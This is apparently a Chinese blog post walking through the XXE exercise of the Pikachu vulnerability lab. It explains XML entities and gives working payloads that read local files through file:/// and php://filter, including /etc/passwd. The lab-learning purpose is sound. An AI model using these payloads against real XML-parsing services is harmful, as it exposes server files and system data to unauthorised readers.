Pikachu-XXE

最新推荐文章于 2024-03-16 20:35:30 发布
最新推荐文章于 2024-03-16 20:35:30 发布
阅读量3.9k 收藏 15
点赞数 14
文章标签: Pikachu xxe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014029795/article/details/103143203
版权

0x00 XXE -“xml external entity injection”

既"xml外部实体注入漏洞"。
概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。
以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。
本章提供的案例中,为了模拟漏洞,通过手动指定LIBXML_NOENT选项开启了xml外部实体解析。

作者写的不是太好懂,这里多补充一点。
XML概念:
XML是可扩展的标记语言(eXtensible Markup Language),设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。但是XML和HTML有明显区别如下:

XML 被设计用来传输和存储数据。
HTML 被设计用来显示数据。

XML结构:

第一部分:XML声明部分
<?xml version="1.0"?>

第二部分:文档类型定义 DTD
<!DOCTYPE note[ 
<!--定义此文档是note类型的文档-->
<!ENTITY entity-name SYSTEM "URI/URL">
<!--外部实体声明-->
]>

第三部分:文档元素
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

其中,DTD(Document Type Definition,文档类型定义),用来为 XML 文档定义语法约束,可以是内部申明也可以使引用外部DTD。

XML中对数据的引用称为实体,实体中有一类叫外部实体,用来引入外部资源,有SYSTEM和PUBLIC两个关键字,表示实体来自本地计算机还是公共计算机,外部实体的引用可以借助各种协议,比如如下的三种,具体的示例可以看下面的xxe漏洞:

file:///path/to/file.ext
http://url
php://filter/read=convert.base64-encode/resource=conf.php

外部引用可支持http,file等协议,不同的语言支持的协议不同,但存在一些通用的协议,具体内容如下所示:
在这里插入图片描述

0x01 xxe漏洞

在这里插入图片描述
这里真的把我坑了很久,在理解完xxe以后,用自己构造的payload始终无法成功,然后用源代码里面的payload同样无法成功,试过apachemime.types修改无效,最终只能放弃php5.5回到phpstudy中使用php5.4成功执行。payload如下:

<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY hacker "ESHLkangi">
]>
<name>&hacker;</name>

payload&hacker;是用来将hacker这个实体进行调用,hacker实体成功在前端回显。
在这里插入图片描述
接下来使用外部的时候又出问题了,换了各种文件都不太行,不管是其它的文件还是同目录文件都不行。

<?xml version="1.0"  encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "file:///D://Programs//PHPStudy//WWW//pikachu//vul//xxe//xxe.php">]>
<name>&xxe;</name>

抱着尝试着心理去试了下php协议,成了。

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<x>&f;</x>

在这里插入图片描述
查了各种资料,折腾了三个小时,哎,不晓得是哪有问题,以后再慢慢研究吧。

11/25/2019更新
问题解决了,之前不能正常使用的原因是升级了php5.5后,有一些php包没有安装,所以无法执行外部实体,在做其它靶场的时候把问题解决了。php55-php-xmlphp55-php-fpm两个包安装就好了。

<?xml version="1.0"  encoding="UTF-8"?>
<!DOCTYPE name [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<name>&xxe;</name>

centos中正常完成复现。
在这里插入图片描述

baynk
关注
  • 14
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
pikachu-master.zip
06-25
Pikachu,这是一个综合类型的靶场练习环境,覆盖了较为全面的漏洞练习,在掌握漏洞原理后,可以通过该靶场来进一步强化自己的知识技能。
Pikachu靶场——XXE 漏洞
来日可期的博客
09-29 3325
XXE(XML External Entity)攻击是一种利用XML解析器漏洞的攻击。在这种攻击中,攻击者通过在XML文件中插入恶意实体来触发解析器加载恶意代码或文件,从而执行任意代码、读取本地文件等操作。在XXE攻击中,攻击者通常会构造一个包含恶意实体的XML文件,并将其提交到目标服务器上进行解析。当服务器使用XML解析器解析文件时,会读取实体并展开其定义,从而导致恶意代码被执行或文件被泄露。
Pikachu靶场-XXE
众生度尽,方证菩提
01-03 204
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
pikachu靶场之XXE漏洞详解
lxz021202的博客
03-02 1063
然后观察请求行、Accept、Content-Type,这里可以从Accept中发现能够接收的文档类型包括xml。上图说明目标主机访问了代码中的网址,那就说明目标主机能够解析xml代码,所以可能存在xxe漏洞。然后在Kali中编辑一个文件xxe.dtd(需要在存在这个文件的目录下开启HTTP服务)这段代码是用来读取本机中的123.txt文件,马赛克处是Kali的IP。这是个域名解析网站,在这里用来检验目标主机是否能够解析xml的代码。这个payload会调用Kali中的xxe.dtd文件。
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6142
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
pikachu XXE (XML外部实体注入)(皮卡丘漏洞平台通关系列)
箭雨镜屋
02-17 5732
一、来自官方的介绍以及来自民间的扩展 1、pikachu官方简介 2、小女子之前画的脑图 3、两个个人感觉不错的博客 https://www.freebuf.com/articles/web/177979.html https://lalajun.github.io/2019/12/03/WEB-XXE/ ...
十一、pikachuXXE
qq_55202378的博客
08-25 376
pikachu XXE
pikachu--XXE
firecjh的博客
06-10 253
3)查看PHP源代码。(文件路径以自己实际电脑为准)XXE进入测试页面。
Pikachu系列——XXE
Zlirving_的博客
05-22 1307
Pikachu靶场系列持续更新~   要像追剧追番一样追下去哦   实验九 —— XXE XXE概述 xml外部实体注入 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 XML概念 XML是可扩展的标记语言,设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。但是XML和HTML有明显区别如下: XML ----
pikachu-master
05-04
pikachu漏洞测试平台搭建
pikachu-interpreter:神秘的编程语言“皮卡丘”的解释器
05-09
可以在找到名为“ pikachu”的深奥编程语言的定义安装$ git clone https://github.com/joelsmithjohnson/pikachu-interpreter$ cd pikachu-interpreter$ python setup.py install用法从命令行。 导航到您的Pikachu...
pikachu-xss.txt
06-10
pikachu-xss
pikachu-文件上传+XXE+不安全的url跳转
qq_47804678的博客
03-22 285
们可以看到,刚把文件上传,还没有点击“开始上传”就已将弹出了警示框,没有交互就已经检测了文件的类型,说明他是在前端进行校验的。那么我们看一下代码:选择浏览,可以看到代码中有一个checkfiletxt()的函数:我们尝试看一下这个函数,果然是他,然后把onchange值改为空,将这个函数删除:再次尝试上传php文件,发现成功上传。(但是只要重新刷新页面,代码就会恢复。服务端check尝试上传php文件,点击上传发现禁止上传,提示只能是图片格式:是一种标准化的方式来表示文档的性质和格式。
Pikachu漏洞平台练习——XXE实体类型举例、Blind OOB XXE、其他协议、XXE漏洞读取文件
7Riven's blog
11-14 1454
1.XXE概述 XXE-“xml external entity injection”,即xml外部实体注入。 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题,也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 2.本地实体类型与外部的实体类型 本地实体类型举例说明如下: <?xml v...
XXE漏洞原理和pikachu靶场实验
最新发布
03-16 802
本文介绍XXE漏洞原理、危害和分类,以及pikachu靶场XXE4个实验。
pikachuXXE漏洞
weixin_51446936的博客
06-18 1946
一、概述 XXE -“xml external entity injection”,即"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。 以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认
pikachuxxe
qq_43665434的博客
02-19 429
pikachuxxe XML基础知识 参考文章 一、什么是xxeXXE即“xml external entity injection”即“xml外部实体注入漏洞”。 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里对应的解析xml的函数默认是禁止解析xml外部实体内容的 就如在php中,对于xml的解析用的是libxml,在libxml版
pikachu-xxe
m0_62094846的博客
09-19 213
然后就能在本地的日志里看到test.txt的内容了(要开访问日志权限)但是这里面返回速度很快的,在网页上测试的时候还是回显很慢,感觉有点问题。但是扫描80端口会快,81会慢,因为80端口开放了。点 response received进行排序。在WWW下保存以test.dtd为名的文件。选择 response received。测试一下是否有xxe漏洞,且是否有回显。把echo $html 注释掉。两个回显都是这样的报错信息。填好数据,然后开始爆破。表示出来,再进行排序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值